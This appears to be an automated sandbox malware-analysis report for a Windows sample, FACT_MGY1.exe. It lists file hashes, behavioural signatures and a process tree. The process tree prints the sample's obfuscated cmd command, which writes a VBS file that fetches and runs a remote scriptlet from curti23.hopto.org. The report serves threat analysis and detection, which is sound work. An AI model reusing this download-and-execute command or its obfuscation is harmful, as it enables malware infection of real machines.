Resubmissions
30-03-2023 14:20
230330-rnhl9ada54 830-03-2023 13:20
230330-qk2qaacg74 824-03-2023 22:33
230324-2gz8tshg59 8Analysis
-
max time kernel
1021s -
max time network
1024s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
30-03-2023 13:20
Static task
static1
Behavioral task
behavioral1
Sample
FACT_MGY1.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
FACT_MGY1.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
~.exe
Resource
win7-20230220-en
General
-
Target
FACT_MGY1.exe
-
Size
526KB
-
MD5
f90662a63fcd773144ef809e09930b3f
-
SHA1
5196017f8f8127398c4fd4a0424a0871f20b4c89
-
SHA256
011c6518502cc9aec7dca14a808b1afa546233d528bd2ebf6485296e3dbd2541
-
SHA512
4cc4c3551e61a5228623d69167abe27a511cce6188294b374e71069a3ac7ece0d077801cfce32a936d1583941b71ce3ec64e086d6eea3b9b98c5c18616a10364
-
SSDEEP
3072:lV/611KEEbL6ETLPWkddkaW9N73oxiZOhAnGVRfN2Zndp9fN+3:IrKxTbfdkpIHVRf4nBfN+3
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
WScript.exeflow pid process 26 3696 WScript.exe 28 3696 WScript.exe 30 3696 WScript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings cmd.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
FACT_MGY1.execmd.execmd.execmd.exedescription pid process target process PID 5084 wrote to memory of 2380 5084 FACT_MGY1.exe cmd.exe PID 5084 wrote to memory of 2380 5084 FACT_MGY1.exe cmd.exe PID 5084 wrote to memory of 2380 5084 FACT_MGY1.exe cmd.exe PID 2380 wrote to memory of 3312 2380 cmd.exe cmd.exe PID 2380 wrote to memory of 3312 2380 cmd.exe cmd.exe PID 2380 wrote to memory of 3312 2380 cmd.exe cmd.exe PID 3312 wrote to memory of 1584 3312 cmd.exe cmd.exe PID 3312 wrote to memory of 1584 3312 cmd.exe cmd.exe PID 3312 wrote to memory of 1584 3312 cmd.exe cmd.exe PID 1584 wrote to memory of 3696 1584 cmd.exe WScript.exe PID 1584 wrote to memory of 3696 1584 cmd.exe WScript.exe PID 1584 wrote to memory of 3696 1584 cmd.exe WScript.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\FACT_MGY1.exe"C:\Users\Admin\AppData\Local\Temp\FACT_MGY1.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c %ComSpec% /V/D/c "echo g53=".":ip5=":":h187="/":GetObject("scripT"+ip5+"https"+ip5+"//curti23"+g53+"hopto"+g53+"org/g1")>%Public%\\ta30.vBs&&%ComSpec% /c start %Public%\\ta30.vBs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /V/D/c "echo g53=".":ip5=":":h187="/":GetObject("scripT"+ip5+"https"+ip5+"//curti23"+g53+"hopto"+g53+"org/g1")>C:\Users\Public\\ta30.vBs&&C:\Windows\system32\cmd.exe /c start C:\Users\Public\\ta30.vBs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Public\\ta30.vBs4⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\ta30.vBs"5⤵
- Blocklisted process makes network request
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\ta30.vBsFilesize
99B
MD58f50a8481daef384086eb26f4ac87393
SHA181cdca33ef00915b7405973cd4eec8d3277ad2c7
SHA2562a2886929768433030434a6c099a7f6ee24d3fd1feab8d6d8a715c436bd99c19
SHA51232bcb7586fa076049c090817c8d8f762581d19dc6ba099b95d67394f03becb5fbfd5d41f72af81641ce17d33bd642fb3ee285544921807e6444cdd2f7d735bb4